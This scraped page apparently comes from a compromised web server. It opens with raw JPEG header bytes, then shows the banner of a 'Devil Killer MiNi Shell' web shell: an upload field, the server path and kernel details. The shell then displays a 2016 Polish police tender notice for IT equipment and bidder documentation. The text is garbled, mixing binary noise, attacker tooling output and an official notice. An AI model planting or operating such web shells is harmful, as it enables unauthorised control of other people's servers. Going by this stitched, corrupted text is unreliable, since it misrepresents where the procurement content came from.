JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160602/65121-N-2016.html

<p class="kh_header"><b>Gorzów Wielkopolski: Zakup sprzętu  informatycznego dla komórek organizacyjnych Policji oraz na pierwsze wyposażenie dla KPP w Krośnie Odrzańskim</b><br>
<b>Numer ogłoszenia: 65121 - 2016; data zamieszczenia: 02.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji , ul. Kwiatowa 10, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 738 14 91, faks 95 738 14 95.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubuska.policja.gov.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Policja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup sprzętu  informatycznego dla komórek organizacyjnych Policji oraz na pierwsze wyposażenie dla KPP w Krośnie Odrzańskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Zakup sprzętu  informatycznego dla komórek organizacyjnych Policji 
na pierwsze wyposażenie dla KPP w Krośnie Odrzańskim.
2.	 Kod CPV: 30236000-2 Różny sprzęt komputerowy, 30213100-6 Komputery przenośne, 30213300-8 Komputer biurkowy, 48000000-8 Pakiety oprogramowania i systemy informatyczne, 30231300-0 Monitory ekranowe, 30232110-8 Drukarki laserowe, 30216110-0 Skanery komputerowe.
3.	W zakres zadania wchodzi dostawa: 
a)	Stanowisko dostępowe All in One - 50 kpl.
b)	Komputer przenośny laptop - 26 kpl.
c)	Drukarka laserowa sieciowa klasy Brother HL-5100DN  - 40 kpl.
d)	Drukarka laserowa kolorowa klasy Brother DCP-L8400CDN - 3  kpl.
e)	Skaner z oprogramowaniem - 4 kpl.
f)	Pakiet biurowy MS Office - 27 sztuk
g)	Komp. przenośny z dotykowym ekranem - 4 kpl.
h)	Monitor do pracy całodobowej - 4 kpl.
4.	 Szczegółowy opis przedmiotu zamówienia określający minimalne wymagania techniczne zamawianego sprzętu zawiera Wykaz  sprzętu informatycznego- sporządzony w formie tabeli do wypełnienia przez Wykonawcę w kwestii oferowanych parametrów technicznych, stanowiący załącznik nr 8 do SIWZ.
5.	SIWZ wraz z załącznikami określa minimalne wymagania techniczne Zamawiającego.
6.	Szczegółowe wymagania dotyczące sposobu realizacji zamówienia, odbioru, serwisu i gwarancji oraz zasady  płatności zawiera Załącznik nr 3 do SIWZ Projekt Umowy. 
7.	W swojej ofercie Wykonawca musi określić rodzaj (nazwę) części/ sprzętu (model jednoznacznej określający produkt) oraz parametry techniczne proponowanego sprzętu.
8.	Zamawiający dopuszcza zaoferowanie towaru równoważnego - przy czym jego wydajność, jakość oraz parametry techniczne nie mogą być mniejsze niż określone przez Zamawiającego w SIWZ i jej załącznikach. Wykazanie   równoważności przedmiotu zamówienia (zgodnie z art. 30 ust. 5) ustawy P.z.p.) spoczywa na Wykonawcy.
9.	  W  przypadku  wyspecyfikowanych  systemów  operacyjnych i pakietów oprogramowania  biurowego, nie dopuszcza się oferowania rozwiązań równoważnych ze względu na ujednolicenie platformy systemów operacyjnych i oprogramowania biurowego zastosowanych w jednostkach 	terenowych Policji województwa lubuskiego. Wyspecyfikowane oprogramowanie współpracuje z funkcjonującym w całej Polsce (w tym woj. lubuskim) Krajowym Systemem Informacji Policji. Wprowadzenie zamienników może spowodować błędne działanie wyżej wymienionego systemu. W związku ze strukturą posiadanych systemów informatycznych, w której aplikacje użytkownika końcowego pracują w oparciu o aplikacje Microsoft oferowany przez wykonawców system operacyjny i oprogramowanie biurowe musi zagwarantować użytkownikowi końcowemu bezawaryjną obsługę aplikacji poprzez unifikacje i kompatybilność proponowanych rozwiązań. Oprogramowanie, o którym mowa powyżej jest powszechnie dostępne u różnych dostawców przez co wskazanie  konkretnego oprogramowania nie narusza zasad równego traktowania Wykonawców oraz zasad uczciwej konkurencji.
10.	 Stacje robocze muszą funkcjonować zgodnie z zasadami bezpieczeństwa obowiązującymi w tych systemach, zgodnie z rozporządzeniem Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych, jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. nr 100, poz. 1024)
11.	 Wykonawca zobowiązuje się dostarczyć przedmiot zamówienia fabrycznie nowy pochodzący z bieżącej produkcji i nie starszy niż 6 m-cy od daty zawarcia umowy, kompletny, a po zainstalowaniu gotowy do eksploatacji bez żadnych dodatkowych nakładów ze strony Zamawiającego.
12.	Na dostarczonym stanowisku komputerowym Wykonawca musi dokonać instalacji zakupionego oprogramowania. Jeżeli do tej instalacji niezbędne jest jakiekolwiek dodatkowe oprogramowanie specyficzne dla zakupionego urządzenia (np. sterowniki urządzeń), Wykonawca dostarczy je na osobnych nośnikach dla każdego zakupionego komputera.
13.	Do dostarczonego sprzętu musi być dołączona karta gwarancyjna zawierająca numer seryjny podzespołu, termin
 i warunki ważności gwarancji, adres i numery telefonów punktów serwisowych świadczących usługi serwisowe.
14.	Wszystkie urządzenia elektryczne muszą być wyposażone w niezbędne kable zasilające i połączeniowe. 
Kable zasilające muszą być zakończone standardowymi dwubolcowymi wtykami z uziemieniem, zgodnie z polską normą PN-IEC=60364-6-61.
15.	Wykonawca gwarantuje dostępność na terenie Polski części zamiennych i eksploatacyjnych dla dostarczonych urządzeń.
16.	Miejsce dostawy: Wykonawca dostarczy stanowiący przedmiot zamówienia  sprzęt informatyczny do jednostki Policji w miejsce wskazane przez Zamawiającego na terenie woj. lubuskiego.
17.	Termin zapłaty za fakturę - 30 dni kalendarzowych od daty wystawienia faktury VAT. Zapłata nastąpi na podstawie faktury po podpisaniu protokołu odbioru
18.	Zamawiający wymaga od Wykonawcy udzielenia gwarancji jakości i serwisu na dostarczony sprzęt. Minimalny wymagany okres gwarancji, jaki Wykonawca musi udzielić Zamawiającemu wynosi  36 m-cy licząc od dnia dokonania odbioru dostarczonego sprzętu.
19.	W okresie gwarancji, w przypadku awarii dysku twardego, będzie on wymieniony przez gwaranta na nowy bez konieczności zwrotu uszkodzonego i dokonywania ekspertyzy poza siedzibą użytkownika końcowego. Uszkodzony dysk twardy pozostaje u Zamawiającego.
20.Termin obowiązywania umowy: od dnia jej zawarcia do 15.09.2016r. 
21. Termin dostawy sprzętu przewiduje się w okresie  od 01.09.2016r. do 15.09.2016r..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.23.60.00-2, 30.21.31.00-6, 30.21.33.00-8, 48.00.00.00-8, 30.23.13.00-0, 30.23.21.10-8, 30.21.61.10-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy i doświadczenia, jeżeli Wykonawca  poprzez informacje zawarte w złożonych, wymaganych w tym celu dokumentach, wykaże że: wykonywał w okresie ostatnich trzech lat przed upływem terminu składania ofert (w przypadku świadczeń okresowych lub ciągłych - również wykonuje; w przypadku jeżeli okres prowadzenia działalności jest krótszy - w tym okresie) minimum 2 dostawy odpowiadające swoim rodzajem i zakresem dostawom stanowiącym przedmiot zamówienia (tj. dostawy sprzętu informatycznego, typu komputery PC, AIO, laptopy, drukarki, urządzenia wielofunkcyjne, skanery, oprogramowanie biurowe) na kwotę minimum 150.000,00 PLN brutto - każda z wykazanych dostaw,  z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, załączy dowody potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/ Spółka cywilna) warunek może być spełniony wspólnie przez wszystkich członków Konsorcjum/ wspólników Spółki cywilnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Na potwierdzenie spełniana przez oferowane usługi wymagań określonych przez Zamawiającego w  SIWZ Zamawiający żąda, aby Wykonawca załączył do oferty:
Oświadczenie (opis) Wykonawcy pn.  Wykaz sprzętu informatycznego- w formie tabeli do wypełnienia przez Wykonawcę w kwestii oferowanego sprzętu i jego parametrów technicznych - zgodnie ze wzorem, który stanowi załącznik nr 8 do SIWZ  Wykaz  sprzętu informatycznego
UWAGA: do Wykazu sprzętu informatycznego Wykonawca musi załączyć wszystkie dokumenty wymagane przez Zamawiającego - opisane w poszczególnych punktach przedmiotowego Wykazu.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INFORMACJA O ZAWARTOŚCI OFERTY WYKONAWCY
1. Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć Wykonawcy w celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp oraz w celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach o których mowa w art. 24 ust. 1 ustawy Pzp i 	niepodlegania wykluczeniu z postępowania o udzielenia zamówienia Wykonawcy w okolicznościach, o których mowa w 	art. 24 ust. 2 ustawy Pzp.
1a. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca zobowiązany jest złożyć:

a)	oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 	ustawy Pzp (wzór - załącznik nr 2a do SIWZ); 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna) oświadczenie powinno być złożone w taki sposób aby wykazać, że warunki udziału w postępowaniu Wykonawcy ci spełniają łącznie (tzn. składa co najmniej jeden z tych Wykonawców albo wszyscy ci Wykonawcy wspólnie lub upoważniony Lider Konsorcjum/ Przedstawiciel w imieniu całego Konsorcjum/ Spółki cywilnej). 
b)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw - wzór stanowi zał. nr 4 do SIWZ); w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, na rzecz których dostawy zostały wykonane, oraz załączeniem dowodów czy zostały wykonane lub są wykonywane należycie. Ze złożonego dokumentu musi wynikać spełnianie warunku opisanego w pkt XII ppkt 2 lit b)  SIWZ.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, Spółka Cywilna) warunek może być wspólnie spełniony przez  członków Konsorcjum/ wspólników Spółki Cywilnej. 
 
1b. W celu wykazania spełniania przez Wykonawcę warunków udziału w postępowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp, Wykonawca zobowiązany jest złożyć:
a) oświadczenie Wykonawcy o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp (załącznik nr 2b do SIWZ).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.

b) aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy Pzp, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert w postępowaniu o udzielenie zamówienia; 
- Samodzielnie pobrane wydruki komputerowe aktualnych informacji o podmiotach wpisanych do Krajowego Rejestru Sądowego oraz zaświadczeń z Centralnej Ewidencji i Informacji o Działalności Gospodarczej posiadają status dokumentu oryginalnego w rozumieniu Rozporządzenia Prezesa Rady Ministrów z dnia 19 lutego 2013 r. w sprawie dokumentów jakich może żądać Zamawiający od Wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz.U. z 2013r., poz. 231).
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.

c) aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 oraz pkt. 10-11 ustawy Pzp, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.

d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy Pzp; wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.

1c. W celu wykazania spełniania warunku udziału w postepowaniu dotyczącego braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 24 ust. 2 pkt 5 ustawy Pzp, Wykonawca zobowiązany jest złożyć:
a)	dokumenty dotyczące przynależności do tej samej grupy kapitałowej: 
W celu wykazania spełniania przez Wykonawcę warunków udziału w postepowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca zobowiązany jest złożyć:
-	jeżeli Wykonawca należy do grupy kapitałowej - listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Pzp (wzór - zał. nr 6 do SIWZ ); 
-	jeżeli Wykonawca nie należy do grupy kapitałowej - informację o tym, że nie należy do grupy kapitałowej 
(wzór - zał. nr 7 do SIWZ ). 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum/ Spółka cywilna), w/w dokument składa każdy z członków Konsorcjum/ wspólników Spółki cywilnej.

Uwaga: 
Zgodnie z art. 24 ust. 2 pkt 5 ustawy Pzp z postępowania o udzielenie zamówienia wyklucza się Wykonawców, którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2015 r., poz. 184, 1618 i 1634), złożyli odrębne oferty lub wnioski o dopuszczenie do udziału w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy Wykonawcami w postępowaniu o udzielenie zamówienia.

2. Inny Podmiot (art. 26 ust. 2b ustawy Pzp)
a)	Jeżeli Wykonawca przy realizacji zamówienia polega na doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, musi do oferty załączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. 

Uwaga: 
- Wykonawca musi przedłożyć oryginał zobowiązania podmiotu trzeciego własnoręcznie podpisanego przez osobę uprawnioną do jego reprezentacji (wyroki KIO z 5 maja 2011 r., sygn. akt KIO/UZP 822/11 oraz z 1 czerwca 2010 r., sygn. akt KIO/UZP 922/10).
- Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy, ubiegającemu się o zamówienie odpowiedniego zasobu, czyli wskazać jego zakres, rodzaj, czas udzielenia, a także inne istotne okoliczności, w tym wynikające ze specyfiki tego zasobu. Z treści dokumentu musi jasno wynikać:
- jaki jest zakres dostępnych Wykonawcy zasobów innego podmiotu, 
- w jaki sposób zostaną wykorzystane zasoby innego podmiotu, przez Wykonawcę przy wykonywaniu zamówienia, 
- jakiego charakteru stosunki będą łączyły Wykonawcę z innym podmiotem, 
- jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu 	    
zamówienia. 
